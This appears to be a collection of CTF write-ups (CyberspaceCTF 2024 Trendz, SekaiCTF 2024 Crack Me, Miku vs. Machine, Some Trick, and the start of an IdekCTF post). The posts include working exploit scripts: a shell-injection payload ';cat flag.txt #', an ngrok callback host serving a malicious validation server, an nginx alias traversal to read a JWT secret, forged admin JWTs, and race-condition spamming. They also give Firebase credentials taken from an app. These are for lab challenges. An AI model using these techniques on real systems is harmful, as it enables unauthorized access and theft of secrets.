URL_HOOK = "https://3fcb-79-33-159-173.ngrok-free.app" # ngrok tunnel with evil_validation.py in listening (so run python3 evil_validation; ngrok http 1338 )

s = requests.Session()

def get_validation():

  preference = base64.b64encode(json.dumps({
      'theme': 'light',
      'language': 'en',
      'validation_server': URL_HOOK
  }).encode()).decode()

  r = s.get(f"{BASE_URL}/release", params={"debug": "true"},
            cookies={"preferences": preference})

  print(f"{s.cookies=}")

def get_flag():
  payload = ';cat flag.txt #' # Bypass for  word_count = f"echo {to_process} | wc -w"
  r = s.post(f"{BASE_URL}/feature",data={"text":payload})
  soup = BeautifulSoup(r.text, 'html.parser')
  print("Flag: " + (soup.find('pre').text).strip())

def main():
  get_validation()
  get_flag()


if __name__ == "__main__":
  main()

# goodluck by @akiidjk

flag: :spoiler[CSCTF{d1d_y0u_71m3_7r4v3l_f0r_7h15_fl46?!}]

Cyberspace2024 | Trendz

Mon, 02 Sep 2024 00:00:00 GMT

Preamble

This challenge is divided into four parts, three webs and a reverse. I'm excited to share that I managed to solve the first two webs! I'll insert them all in a write-up, trying to explain them in the way the author thought. I admit I did not solve them in order, but I'm eager to see how they fit together. The application was written in Go using templates and a JWT authentication, and it's write well! The application itself has many files, but they are well written and ordered, so a thorough analysis is not difficult but necessary. The application is divided into 5 basic parts.

Config file: ngix.conf ,run.sh,init.sql, dockerfile and .dockerignore
Main go file: main.go This is where you'll find all the details about how to use the different functions and what they do!
Dashboard: Here are the 3 types of dashboards possible in the application
Jwt handler: How to use JWT for authentication.
Service: The various services such as post creation or user validation

Application flow

The basic application is presented with a login/registration screen where once we are logged in we are assigned an accesstoken and a refreshtoken, a redirect to the standard user dashboard occurs where we can create posts and view them via /posts/post-id,basically more than this we cannot do

Path structure

As mentioned before in the main.go we find the path declaration and some very important initialization functions

// filename: main.go

func main() {
 s := gin.Default()
 s.LoadHTMLGlob("templates/*")
 db.InitDBconn()
 jwt.InitJWT() // Initialization of jwt we will analyze it later

 s.GET("/", func(c *gin.Context) {
  c.Redirect(302, "/login")
 })
 s.GET("/ping", func(c *gin.Context) {
  c.JSON(200, gin.H{
   "message": "pong",
  })
 })
 r := s.Group("/")
 r.POST("/register", service.CreateUser)
 r.GET("/register", func(c *gin.Context) {
  c.HTML(200, "register.tmpl", gin.H{})
 })
 r.POST("/login", service.LoginUser)
 r.GET("/login", func(c *gin.Context) {
  c.HTML(200, "login.tmpl", gin.H{})
 })

 r.GET("/getAccessToken", service.GenerateAccessToken)

 authorizedEndpoints := r.Group("/user")
 authorizedEndpoints.Use(service.AuthorizeAccessToken())
 authorizedEndpoints.GET("/dashboard", dashboard.UserDashboard)
 authorizedEndpoints.POST("/posts/create", service.CreatePost)
 authorizedEndpoints.GET("/posts/:postid", service.ShowPost)
 authorizedEndpoints.GET("/flag", service.DisplayFlag)

 adminEndpoints := r.Group("/admin")
 adminEndpoints.Use(service.AuthorizeAccessToken())
 adminEndpoints.Use(service.ValidateAdmin())
 adminEndpoints.GET("/dashboard", dashboard.AdminDashboard)

 SAEndpoints := r.Group("/superadmin")
 SAEndpoints.Use(service.AuthorizeAccessToken())
 SAEndpoints.Use(service.ValidateAdmin())
 SAEndpoints.Use(service.AuthorizeRefreshToken())
 SAEndpoints.Use(service.ValidateSuperAdmin())
 SAEndpoints.GET("/viewpost/:postid", dashboard.ViewPosts)
 SAEndpoints.GET("/dashboard", dashboard.SuperAdminDashboard)
 s.NoRoute(custom.Custom404Handler)
 s.Run(":8000")
}

As it is seen the scheme of the paths is very clear and it is well done basically we have the login and registration and then we move to a division by role where we have a user section an admin and a superadmin each of them with their own validation services

Config files

# filename: run.sh

#!/bin/env sh
cat /dev/urandom | head | sha1sum | cut -d " " -f 1 > /app/jwt.secret

export JWT_SECRET_KEY=notsosecurekey
export ADMIN_FLAG=CSCTF{flag1}
export POST_FLAG=CSCTF{flag2}
export SUPERADMIN_FLAG=CSCTF{flag3}
export REV_FLAG=CSCTF{flag4}
export POSTGRES_USER=postgres
export POSTGRES_PASSWORD=mysecretpassword
export POSTGRES_DB=devdb

uuid=$(cat /proc/sys/kernel/random/uuid)
user=$(cat /dev/urandom | head | md5sum | cut -d " " -f 1)
cat << EOF >> /docker-entrypoint-initdb.d/init.sql
 INSERT INTO users (username, password, role) VALUES ('superadmin', 'superadmin', 'superadmin');
    INSERT INTO posts (postid, username, title, data) VALUES ('$uuid', '$user', 'Welcome to the CTF!', '$ADMIN_FLAG');
EOF

docker-ensure-initdb.sh &
GIN_MODE=release /app/chall & sleep 5
su postgres -c "postgres -D /var/lib/postgresql/data" &

nginx -g 'daemon off;'

This file is actually very important because it gives us an idea of where the flags are (which fortunately are also numbered)

As we see the first thing that is done is to create a file called jwt.secret that will be a source of interest later,

We see that another jwt secret is initialized and 4 flags in 4 different environment variables,

Queries are made one in which the superadmin user is created and another in which the flag is inserted in a record in the posts table

Finally, the postgree database and the ngix server are started.


user  nobody;
worker_processes  auto;

events {
    worker_connections  1024;
}


http {
    include       mime.types;
    default_type  application/octet-stream;

    sendfile        on;
    keepalive_timeout  65;

    server {
        listen       80;
        server_name  localhost;
        location / {
            proxy_pass http://localhost:8000;
        }
        location /static {
            alias /app/static/;
        }
        error_page   500 502 503 504  /50x.html;
        location = /50x.html {
            root   html;
        }

    }

}

This is the ngix configuration, where a fairly standard configuration is written, except for declaring a /static alias.

Well, once I've finished presenting the application, I'd say you're ready to go...

Trendz Part 1

Description: The latest trendz is all about Go and HTMX, but what could possibly go wrong? A secret post has been hidden deep within the application. Your mission is to uncover it.

Note: This challenge consists of four parts, which can be solved in any order. However, the final part will only be accessible once you've completed this initial task, and will be released in Wave 3.

Introduction

Well, as we saw in the run.sh file, the first flag is inside a record in the post table and it is also called ADMIN_FLAG, so the first thing to see is how admin authentication works and what the admin dashboard can do.

Source

// filename: AdminDash.go

package dashboard

import (
 "app/handlers/service"
 "os"

 "github.com/gin-gonic/gin"
)

func AdminDashboard(ctx *gin.Context) {
 posts := service.GetAllPosts()
 ctx.HTML(200, "adminDash.tmpl", gin.H{
  "flag":  os.Getenv("ADMIN_FLAG"),
  "posts": posts,
 })
}

As we can see, the dashboard is very concise, we simply see that the GetAllPosts() function is called and then they are sent to the template, so not much to do here, let's move on to how the admin is authenticated.

//filename: main.go

adminEndpoints := r.Group("/admin")
adminEndpoints.Use(service.AuthorizeAccessToken())
adminEndpoints.Use(service.ValidateAdmin())
adminEndpoints.GET("/dashboard", dashboard.AdminDashboard)

As we can see from the code, whenever we try to connect to the admin dashboard, it first runs two functions, ValidateAccess() and ValidateAdmin().

//filename: JWTHandler.go

func AuthorizeAccessToken() gin.HandlerFunc {
 return func(c *gin.Context) {
  c.Header("X-Frame-Options", "DENY")
  c.Header("X-XSS-Protection", "1; mode=block")
  const bearerSchema = "Bearer "
  var tokenDetected bool = false
  var tokenString string
  authHeader := c.GetHeader("Authorization")
  if len(authHeader) != 0 {
   tokenDetected = true
   tokenString = authHeader[len(bearerSchema):]
  }
  if !tokenDetected {
   var err error
   tokenString, err = c.Cookie("accesstoken")
   if tokenString == "" || err != nil {
    c.Redirect(302, "/getAccessToken?redirect="+c.Request.URL.Path)
   }
  }
  fmt.Println(tokenString)
  token, err := jwt.ValidateAccessToken(tokenString)
  if err != nil {
   fmt.Println(err)
   c.AbortWithStatus(403)
  }
  if token.Valid {
   claims := jwt.GetClaims(token)
   fmt.Println(claims)
   c.Set("username", claims["username"])
   c.Set("role", claims["role"])
  } else {
   fmt.Println("Token is not valid")
   c.Header("HX-Redirect", "/getAccessToken")
   c.AbortWithStatus(403)
  }
 }
}

This is a pretty standard function regarding JWT integrity checking, in fact here we see that the function checks that the cookie is well formatted and has no problems by validating it with the ValidateAccessToken() function, otherwise it rejects it or aborts the operation.

//filename: JWTAuth.go

func ValidateAccessToken(encodedToken string) (*jwt.Token, error) {
 return jwt.Parse(encodedToken, func(token *jwt.Token) (interface{}, error) {
  _, isValid := token.Method.(*jwt.SigningMethodHMAC)
  if !isValid {
   return nil, fmt.Errorf("invalid token with signing method: %v", token.Header["alg"])
  }
  return []byte(secretKey), nil
 })
}

// The function is safe and it is not subject to `alg:none` or any other kind of attack, so we must move on.

//filename: ValidateAdmin.go

func ValidateAdmin() gin.HandlerFunc {
 return func(c *gin.Context) {
  const bearerSchema = "Bearer "
  var tokenDetected bool = false
  var tokenString string
  authHeader := c.GetHeader("Authorization")
  if len(authHeader) != 0 {
   tokenDetected = true
   tokenString = authHeader[len(bearerSchema):]
  }
  if !tokenDetected {
   var err error
   tokenString, err = c.Cookie("accesstoken")
   if tokenString == "" || err != nil {
    c.Redirect(302, "/getAccessToken?redirect="+c.Request.URL.Path)
   }
  }
  fmt.Println(tokenString)
  claims := jwt.ExtractClaims(tokenString)
  if claims["role"] == "admin" || claims["role"] == "superadmin" {
   fmt.Println(claims)
  } else {
   fmt.Println("Token is not valid")
   c.AbortWithStatusJSON(403, gin.H{"error": "User Unauthorized"})
   return
  }
 }
}

Instead, we see here that the role is validated in the JWT by checking that it is at least admin or superadmin.

Solution

Mmm authentication seems secure let's take a step back and go to the JWTInit function.

//filename: JWTAuth.go

func InitJWT() {
 key, err := os.ReadFile("jwt.secret")
 if err != nil {
  panic(err)
 }
 secretKey = key[:]
 fmt.Printf("JWT initialized %v\n", secretKey)
}

We see that the function itself doesn't do much simply takes the key with which it will sign jwt's from a file well known to us in fact we have seen it in run.sh where it is created and where a secure value is put there

But if we analyse the Docker file system locally, we see that jwt.secret is located in the same folder as static, which we saw in the ngix configuration create an alias to that path.

location /static {
            alias /app/static/;
        }

If we try to access /static we can see.

NOTHING... But we can wander around a bit for js and css files that we don't need though, And if we try a class ../ after static we see that it doesn't find anything there

Hmm will there be a way to bypass the ngix and access the file?

Well actually yes because the configuration as we see on hacktricks is insecure and easily bypassed like this

And if we try to type /static../jwt.secret... NICE WE GOT THE JWT SECRET

Now just change the role of the jwt and re-sign it but we'll see that later in detail being that the challenge itself is solved... (At the end see the #PS)

Trendz Part 2

Descripion: Staying active has its rewards. There's a special gift waiting for you, but it's only available once you've made more than 12 posts. Keep posting to uncover the surprise!

Note: Use the instancer and source from part one of this challenge, Trendz.

Introduction

We are in the second part of the Trendz challenge, so we have exactly the same application, only the target flag has changed.

Source

First thing to figure out is where the flag is located, going back to the run.sh we see that the file is located inside the POST_FLAG environment variable so we presso let's assume that the posts center something, searching the directories with grep or something else we see that the variable is called here:

//filename: Posts.go

func DisplayFlag(ctx *gin.Context) {
 username := ctx.MustGet("username").(string)
 noOfPosts := CheckNoOfPosts(username)
 if noOfPosts <= 12 {

  ctx.JSON(200, gin.H{"error": fmt.Sprintf("You need %d more posts to view the flag", 12-noOfPosts)})
  return
 }
 ctx.JSON(200, gin.H{"flag": os.Getenv("POST_FLAG")})
}

Oh we just need to make 12 simple posts no?

Well not really in fact if we see the function that creates the posts we can see that it doesn't allow us to make more than 12

//filename: Posts.go

func CreatePost(ctx *gin.Context) {
 username := ctx.MustGet("username").(string)
 noOfPosts := CheckNoOfPosts(username)
 var req struct {
  Title string `json:"title"`
  Data  string `json:"data"`
 }
 if err := ctx.BindJSON(&req); err != nil {
  ctx.JSON(400, gin.H{"error": "Invalid request"})
  fmt.Println(err)
  return
 }
 if noOfPosts >= 10 {
  ctx.JSON(200, gin.H{"error": "You have reached the maximum number of posts"})
  return
 }
 if len(req.Data) > 210 {
  ctx.JSON(200, gin.H{"error": "Data length should be less than 210 characters"})
  return
 }
 postID := InsertPost(username, req.Title, req.Data)
 ctx.JSON(200, gin.H{"postid": postID})
}

As we can see, a function is executed that checks the number of posts, which in itself is not a major problem, the problem lies in the misuse of this function.

This is because although go is very fast and even postgree actually this doesn't stop us from making a race condition

Solution

The solution itself is very simple just create a large amount of requests simultaneously with the same session and hope to enter more posts than allowed by doing so we will be able to bypass the control and get our flag

Probably the reason it works is much more precise and technical, but to tell you the truth, it came to me as soon as I saw it and tried it, and apparently my hunch was right...

Final script

This is the final exploit script with the 2 challenge solution

# filename: exploit.py
#!/usr/bin/python3

from concurrent.futures import ThreadPoolExecutor, as_completed
from bs4 import BeautifulSoup
import requests
import jwt
import string
import random

BASE_URL = "https://ID-INSTANCE.bugg.cc/"

s = requests.Session()

def random_string(length):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))


def login(username, password):
    response = s.post(f"{BASE_URL}/login",
                      json={"username": username, "password": password})
    if response.status_code != 200:
        print(f"Login failed: {response.status_code}")
        exit(response.status_code)


def register(username, password):
    response = s.post(f"{BASE_URL}/register",
                      json={"username": username, "password": password})
    if response.status_code != 200:
        print(f"Register failed: {response.status_code}")
        exit(response.status_code)

def logout():
    s.cookies.clear()

def create_post(title: str = "title", content: str = "content"):
    response = s.post(f"{BASE_URL}/user/posts/create",
                      json={"title": title, "data": content})
    if response.status_code != 200:
        print(f"Post creation failed: {response.status_code}")
        exit(response.status_code)


def run_tasks(num_tasks, concurrency_limit):
    results = []
    with ThreadPoolExecutor(max_workers=concurrency_limit) as executor:
        futures = [executor.submit(create_post)
                   for _ in range(num_tasks)]
        for future in as_completed(futures):
            results.append(future.result())

    return results

def download_secret():
  r = s.get(f"{BASE_URL}/static../jwt.secret", stream=True)
  with open("jwt.secret", "wb") as f:
      for chunk in r.iter_content(chunk_size=1024):
        f.write(chunk)

def resign_jwt(claims, secret_key):
    return jwt.encode(claims, secret_key, algorithm='HS256')

def get_flag_2():
    for _ in range(10):
        print("Try: " + str(_),end="\r")
        run_tasks(num_tasks=50,concurrency_limit=100)
        response = s.get(f"{BASE_URL}/user/flag")
        if "CSCTF{" in response.text:
            print("Flag 2 trendzz: " + response.json()['flag'])
            return True
        else:
            logout()
            username, password = random_string(10), random_string(10)
            register(username, password)
            login(username, password)
    return False

def get_flag_1():
    download_secret()

    with open("./jwt.secret", "rb") as file:
        key = file.read()

    print(f"Jwt secret leaked: {key}")

    original_token = s.cookies.get_dict().get("accesstoken")

    decoded_claims = jwt.decode(original_token, key, algorithms=['HS256'])

    decoded_claims['role'] = 'admin'

    new_jwt = resign_jwt(decoded_claims, key)

    s.cookies.update({"accesstoken": new_jwt})

    response = requests.get(f"{BASE_URL}/admin/dashboard",cookies={"accesstoken": new_jwt})

    soup = BeautifulSoup(response.text, 'html.parser')
    postid = soup.find_all('td')[1].text

    print(f"Post-id: {postid}")

    flag = s.get(f"{BASE_URL}/user/posts/{postid}").json().get("data")

    print("Flag 1 trendz: " + flag)

def main():
    print("Exploiting...")

    username, password = random_string(10), random_string(10)
    register(username, password)
    login(username, password)

    get_flag_1()

    if not get_flag_2():
        print("Flag 2 retrieval failed try again :(")

if __name__ == "__main__":
    main()

flag: :spoiler[CSCTF{0a97afb3-64be-4d96-aa52-86a91a2a3c52}]

flag: :spoiler[CSCTF{d2426fb5-a93a-4cf2-b353-eac8e0e9cf94}]

PS:

In the first flag I skipped a very funny part, in fact it is not enough to log in only as admin because we will not be shown the flag but a post of an ID that if you remember the flag was also in a precise record initialised in run.sh, if through /user/posts/post-id we view the post we can find the flag

SekaiCTF2024 | Crack Me

Mon, 26 Aug 2024 00:00:00 GMT

Introduction

First rev ctf of Sekai 2024 with an apk attached, so we have a mobile challenge on our hands. The first thing to do (which I strongly advise against in a real environment) is to download and install the app to get a quick overview of what it does.

As you can see, the app doesn't allow us to do much more than press the button and log in (without being able to register).

First step

The first thing I did was to analyse the apk using an online tool. SISIK

And two interesting pieces of information came up: the first was that it was a react-native app, which helps us a lot in reverse, and that the app was using firebase to handle the backend and probably authentication as well.

Second Step

The apk is actually a compressed set of java files like a zipper and tar, this then allows us to easily extract the contents with any tool like unzip or 7z (in my case I used extract which is a utils of zsh).

Once we have extracted the contents we should find something like this

As we can see, we have a huge number of files, but this is where tools like grep or fzf come in.

This allows us to search for files based on keywords as in my case: admin,sekai,user,password

After some research we can find us an obfuscated js file named: index.android.bundle

After some research we can find there a file named index.android.bundle with some obfuscated javascript inside, knowing that the application is written in react-native and that inside this file there are keywords like: admin,sekai,password, it is definitely an interesting file.

Third Step

One possible idea might be a react-native app decompiler, which fortunately exists and is easy to find in the case I used: React Native Decompiler

Once installed, and running the command react-native-decompiler index.android.bundle -o bundle_deobfuscated, we should find about 800 js files, a bit confusing but understandable with a little effort.

Fourth Step

We can reuse grep and fzf to search again for the words of interest.

By searching, we manage to find a really interesting file, in which we find the login system that is done in the application.

function _() {
  var e, o;
  module25.default(this, _);
  (e = L.call(this, ...args)).state = {
    email: "",
    password: "",
    wrongEmail: false,
    wrongPwd: false,
    checked: false,
    verifying: false,
    errorTitle: "",
    errorMessage: "",
  };
  e._verifyEmail =
    ((o = module275.default(function* (t) {
      t.setState({
        verifying: true,
      });
      var n = module478.initializeApp(module477.default),
        o = module486.getDatabase(n);
      if (
        "admin@sekai.team" !== t.state.email ||
        false === e.validatePassword(t.state.password)
      )
        console.log("Not an admin account.");
      else console.log("You are an admin...This could be useful.");
      var s = module488.getAuth(n);
      module488
        .signInWithEmailAndPassword(s, t.state.email, t.state.password)
        .then(function (e) {
          t.setState({
            verifying: false,
          });
          var n = module486.ref(o, "users/" + e.user.uid + "/flag");
          module486.onValue(n, function () {
            t.setState({
              verifying: false,
            });
            t.setState({
              errorTitle: "Hello Admin",
              errorMessage: "Keep digging, you are almost there!",
            });
            t.AlertPro.open();
          });
        })
        .catch(function (e) {
          // Different error messages
        });
    })),
    function (e) {
      return o.apply(this, arguments);
    });

  e.validatePassword = function (e) {
    if (17 !== e.length) return false;
    var t = module700.default.enc.Utf8.parse(module456.default.KEY),
      n = module700.default.enc.Utf8.parse(module456.default.IV);
    return (
      "03afaa672ff078c63d5bdb0ea08be12b09ea53ea822cd2acef36da5b279b9524" ===
      module700.default.AES.encrypt(e, t, {
        iv: n,
      }).ciphertext.toString(module700.default.enc.Hex)
    );
  };
}

Now let's analyse the operation of the login... as we can see the email that checks for the login is only one, that of the admin admin@sekai.team and the password is checked with a function in particular validatePassword.

Going to analyse the function, we see that the decryption of a hex string is done via AES, but even more important detail, the IV and the Key are imported from another file, by analysing the form in question we can find out the value of the IV and the Key.

var _ = {
  LOGIN: "LOGIN",
  EMAIL_PLACEHOLDER: "user@sekai.team",
  PASSWORD_PLACEHOLDER: "password",
  BEGIN: "CRACKME",
  SIGNUP: "SIGN UP",
  LOGOUT: "LOGOUT",
  KEY: "react_native_expo_version_47.0.0",
  IV: "__sekaictf2023__",
};
exports.default = _;

This allows us to easily find the password even with a trivial Python script like this one:


from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = b"react_native_expo_version_47.0.0"[:32]
iv = b"__sekaictf2023__"
ciphertext = binascii.unhexlify(
    "03afaa672ff078c63d5bdb0ea08be12b09ea53ea822cd2acef36da5b279b9524")
email = "admin@sekai.team"

def decrypt_password():
  cipher = AES.new(key, AES.MODE_CBC, iv)
  decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)

  password = decrypted.decode('utf-8')
  assert len(password) == 17

  return password

  def main():
    password = decrypt_password()
    print("password:", password)
    print("email: ", email)

if __name__ == '__main__':
    main()


# OUTPUT:

# password: s3cr3t_SEKAI_P@ss
# email: admin@sekai.team

PERFECT! It's done, we have the flag, we just need to log in to the application

OR MAYBE NOT 😥...

Fifth step

After a moment's panic, I resume checking the code and how the login system works; indeed, we can see that as soon as the login is complete, a request is made to the database (probably the firebase realtime database)

So, in a sense, the flag has been given to us, we just have to catch it on the fly, and there are two ways of doing that.

Unintended solution

The first solution was to intercept the call and answer from the app to the db and vice versa, but using arch with an NVIDIA video card I had trouble with Android emulation, but you can still find a solution. similar solution

Intended solution (The one i performed)

Given my difficulties with the emulation of the application, I continued my search for code, this time also searching Firebase, and managed to find something very interesting

var c = {
  apiKey: "AIzaSyCR2Al5_9U5j6UOhqu0HCDS0jhpYfa2Wgk",
  authDomain: "crackme-1b52a.firebaseapp.com",
  projectId: "crackme-1b52a",
  storageBucket: "crackme-1b52a.appspot.com",
  messagingSenderId: "544041293350",
  appId: "1:544041293350:web:2abc55a6bb408e4ff838e7",
  measurementId: "G-RDD86JV32R",
  databaseURL: "https://crackme-1b52a-default-rtdb.firebaseio.com",
};
exports.default = c;

As you can see, we are faced with a firebase configuration file with sensitive information that allows us to connect directly to the firebase database using js. So in the end we just need to replicate the functions used in the login to get the flag.

Solution

...

# filename: exploit.py

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import binascii
import subprocess

key = b"react_native_expo_version_47.0.0"[:32]
iv = b"__sekaictf2023__"
ciphertext = binascii.unhexlify(
    "03afaa672ff078c63d5bdb0ea08be12b09ea53ea822cd2acef36da5b279b9524")
email = "admin@sekai.team"


def get_flag(email, password):
    process = subprocess.Popen(
        ["node", "exploit.js", email, password],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )

    stdout, stderr = process.communicate()

    print(stdout.decode('utf-8'))

    if stderr:
        print(stderr.decode('utf-8'))

def decrypt_password():
  cipher = AES.new(key, AES.MODE_CBC, iv)
  decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)

  password = decrypted.decode('utf-8')
  assert len(password) == 17

  return password

def main():
    password = decrypt_password()
    print("password:", password)
    print("email: ", email)
    get_flag(email, password)


if __name__ == '__main__':
    main()

// filename: exploit.js
import { initializeApp } from "firebase/app";
import { getAuth, signInWithEmailAndPassword } from "firebase/auth";
import { getDatabase, ref, get } from "firebase/database";
import { exit } from "process";

let app = initializeApp({
  apiKey: "AIzaSyCR2Al5_9U5j6UOhqu0HCDS0jhpYfa2Wgk",
  authDomain: "crackme-1b52a.firebaseapp.com",
  storageBucket: "crackme-1b52a.appspot.com",
  projectId: "crackme-1b52a",
  messagingSenderId: "544041293350",
  appId: "1:544041293350:web:2abc55a6bb408e4ff838e7",
  measurementId: "G-RDD86JV32R",
  databaseURL: "https://crackme-1b52a-default-rtdb.firebaseio.com",
});

var db = getDatabase(app);
var auth = getAuth(app);

async function loginAndGetFlag(email, password) {
  try {
    const userCredential = await signInWithEmailAndPassword(
      auth,
      email,
      password
    );
    console.log("Logged in");
    var n = ref(db, "users/" + userCredential.user.uid + "/flag");

    const snapshot = await get(n);
    if (snapshot.exists()) {
      console.log("Flag value:", snapshot.val());
    }
  } catch (error) {
    console.error("Error logging in or fetching flag:", error);
  }
}

const args = process.argv.slice(2);
const email = args[0];
const password = args[1];

flag: :spoiler[SEKAI{15_React_N@71v3_R3v3rs3_H@RD???}]

SekaiCTF2024 | Miku vs. Machine

Mon, 26 Aug 2024 00:00:00 GMT

Official resources of challenge

Introduction

The goal is to distribute the hours of n singers in m shows. Each show has a number of hours equal to l (unknown) and can only change singers once. We also want that each singer will have the same time on stage.

Solution

To solve this problem, I use a greedy strategy that iteratively divides the available singing time among the singers, ensuring that each singer fulfills their required hours.

T = int(input())

for _ in range(T):
    n, m = map(int, input().split(' '))
    l = n
    print(l)
    duration_for_singer = m
    singers = [duration_for_singer] * n
    for i in range(len(singers)):
        while singers[i] > 0:
            show = []
            if (singers[i] - l) >= 0:
                show.append((l//2, i+1))
                show.append((l - l//2, i+1))
                singers[i] -= l
            elif singers[i] < l:
                show.append((singers[i], i+1))
                show.append((l - singers[i], i+2))
                singers[i+1] -= l - singers[i]
                singers[i] = 0
            print(f"{show[0][0]} {show[0][1]} {show[1][0]} {show[1][1]}")

Step-by-Step Explanation

Initialization

The first input T represents the number of test cases.
After some experimentation on pen and paper, I noticed that the minimum value of l is equal to the number of singers, so l is set to n.
I initialize a list singers of length n, where each element is set to m to represent the remaining singing hours for each singer.

Time Distribution Logic

I iterate over each singer using a loop. For each singer i, the following steps are performed:
- While Loop: Continue allocating time to the current singer as long as they have hours remaining (singers[i] > 0).
- Time Allocation:
  - If the current singer has l or more hours remaining, divide l hours into two chunks:
    - The first chunk is l//2 hours, and the second chunk is l - l//2 hours. Both chunks are allocated to the same singer.
    - Subtract l from the singer's remaining hours.
  - If the current singer has less than l hours remaining:
    - Allocate all remaining hours to the current singer.
    - Allocate the rest of l to the next singer in line (i+2).
    - Subtract the hours from the next singer's total.
- Output:
  - After each allocation, the result is stored in a list show and printed in the format {hours1} {singer1} {hours2} {singer2}.

Output

The program prints the number l as the first line for each test case.
For each show, the specific distribution of hours between the singers is printed.

Example Execution

Input

n = 4
m = 7

Execution

l = 4
singers = [7, 7, 7, 7]

i = 0
- show = (hours:2 singer:1 , hours:2 singer:1)
  singers = [3, 7, 7, 7]
- show = ( hours:3 singer:1 , hours:1 singer:2 )
  singers = [0, 6, 7, 7]
i = 1
- show = ( hours:2 singer:2 , hours:2 singer:2 )
  singers = [0, 2, 7, 7]
- show = ( hours:2 singer:2 , hours:2 singer:3 )
  singers = [0, 0, 5, 7]
i = 2
- show = ( hours:2 singer:3 , hours:2 singer:3 )
  singers = [0, 0, 1, 7]
- show = ( hours:1 singer:3 , hours:3 singer:4 )
  singers = [0, 0, 0, 4]
i = 3
- show = ( hours:2 singer:4 , hours:2 singer:4 )
  singers = [0, 0, 0, 0]

Output

Conclusion

I don't consider this challenge difficult, it's just a greedy algorithm (it takes a lot more to scare a LeetCode boy), but it wasn't immediately clear that the output didn't necessarily have to be the same as that shown in the challenge's PDF , but it was enough to fit the constraints of the problem.

flag: :spoiler[SEKAI{t1nyURL_th1s:_6d696b75766d}]

SekaiCTF2024 | Some Trick

Mon, 26 Aug 2024 00:00:00 GMT

Introduction

Some Trick was the first cryptography challenge in the 2024 edition of SekaiCTF. The challenge implements a key exchange based on a set of permutations and asks us to retrieve the flag that was used as a key in Bob's first encryption.

import random
from secrets import randbelow, randbits
from flag import FLAG

CIPHER_SUITE = randbelow(2**256)
print(f"oPUN_SASS_SASS_l version 4.0.{CIPHER_SUITE}")
random.seed(CIPHER_SUITE)

GSIZE = 8209
GNUM = 79

LIM = GSIZE**GNUM


def gen(n):
    p, i = [0] * n, 0
    for j in random.sample(range(1, n), n - 1):
        p[i], i = j, j
    return tuple(p)


def gexp(g, e):
    res = tuple(g)
    while e:
        if e & 1:
            res = tuple(res[i] for i in g)
        e >>= 1
        g = tuple(g[i] for i in g)
    return res


def enc(k, m, G):
    if not G:
        return m
    mod = len(G[0])
    return gexp(G[0], k % mod)[m % mod] + enc(k // mod, m // mod, G[1:]) * mod


def inverse(perm):
    res = list(perm)
    for i, v in enumerate(perm):
        res[v] = i
    return res


G = [gen(GSIZE) for i in range(GNUM)]


FLAG = int.from_bytes(FLAG, 'big')
left_pad = randbits(randbelow(LIM.bit_length() - FLAG.bit_length()))
FLAG = (FLAG << left_pad.bit_length()) + left_pad
FLAG = (randbits(randbelow(LIM.bit_length() - FLAG.bit_length()))
        << FLAG.bit_length()) + FLAG

bob_key = randbelow(LIM)
bob_encr = enc(FLAG, bob_key, G)
print("bob says", bob_encr)
alice_key = randbelow(LIM)
alice_encr = enc(bob_encr, alice_key, G)
print("alice says", alice_encr)
bob_decr = enc(alice_encr, bob_key, [inverse(i) for i in G])
print("bob says", bob_decr)

Solution

The first thing we do is retrieve the CIPHER_SUITE variable to set the random seed and reconstruct the set of permutations G, then we care about retrieving bob_key to ultimately recover the flag.

s = int(r.recvline().strip().decode().split('.')[-1])
random.seed(s)

G = [gen(GSIZE) for i in range(GNUM)]

def decm(k, G, val):
    m = 0
    for i in range(GNUM):
        x = val % GSIZE
        y = gexp(G[i], k % GSIZE).index(x)
        m += y * GSIZE ** i
        val = (val - x) // GSIZE
        k //= GSIZE
    return m

bob_key = decm(alice_encr, G, bob_encr)

Recovering the flag takes a bit more work, I've only managed a brute-force solution which I optimized the best I could; it's not the best but it does the job.

def maketable(g):
    gg = deepcopy(g) # just to be safe
    table = {}
    for i in range(GSIZE):
        table[i] = gg
        gg = tuple(gg[i] for i in gg)
    return table

def perm(table, e):
    res = tuple(table[0])
    rbits = reversed(bits(e))
    ones = filter(lambda x: x != -1, [i if v == 1 else -1 for i, v in enumerate(rbits)])
    for index in ones:
        res = tuple(res[j] for j in table[index])
    return res

def findk(queue, event, table, start, end, index, want):
    for k in range(start, min(GSIZE, end)):
        if event.is_set():
            return
        if perm(table, k)[index] == want:
            event.set()
            queue.put(k)
            return

def deck(m, G, val):
    key = 0
    for i in range(GNUM):
        x = val % GSIZE
        table = maketable(G[i])
        queue = mp.Queue()
        event = mp.Event()
        ps = [mp.Process(target=findk, args=(queue, event, table, start, start + (GSIZE // mp.cpu_count()) + 1, m % GSIZE, x)) for start in range(0, GSIZE, GSIZE // mp.cpu_count())][:mp.cpu_count()]
        for p in ps:
            p.start()

        k = queue.get()
        if k == 0:
            return key

        key += k * GSIZE ** i
        val = (val - x) // GSIZE
        m //= GSIZE
    return key + m * GSIZE ** GNUM

key = deck(bob_key, G, bob_encr)

The recovered key isn't the flag yet, as it went through some transformations first, but it's clear that the flag's bits are still there in the middle, untouched between the two paddings, so we can just do some shifting until we find it.

    for i in range(key.bit_length()):
        shifted = key >> i
        for j in range(1, shifted.bit_length()):
            keepmask = (1 << j) - 1
            final = shifted & keepmask
            dec = final.to_bytes(keepmask.bit_length() // 8 + 1)
            if b'SEKAI{' in dec:
                start = dec.index(b'SEKAI')
                end = start + dec[start:].index(b'}') + 1
                print(f'flag: {dec[start:end].decode()}')
                break
        else:
            continue
        break

flag: :spoiler[SEKAI{7c124c1b2aebfd9e439ca1c742d26b9577924b5a1823378028c3ed59d7ad92d1}]

IdekCTF2024 | Hello

Sun, 18 Aug 2024 00:00:00 GMT

Introduction

Then we have an apparently empty page, but where we can via a ?name= parameter enter some text, the page will then respond with hello, {text entered}

The with an ngix server

Moreover, ctf in general gives us the possibility of using an admin bot where the flag is set in the cookies

Source

# filename: index.py

<?php


function Enhanced_Trim($inp) {
    $trimmed = array("\r", "\n", "\t", "/", " ");
    return str_replace($trimmed, "", $inp);
}


if(isset($_GET['name']))
{
    $name=substr($_GET['name'],0,23);
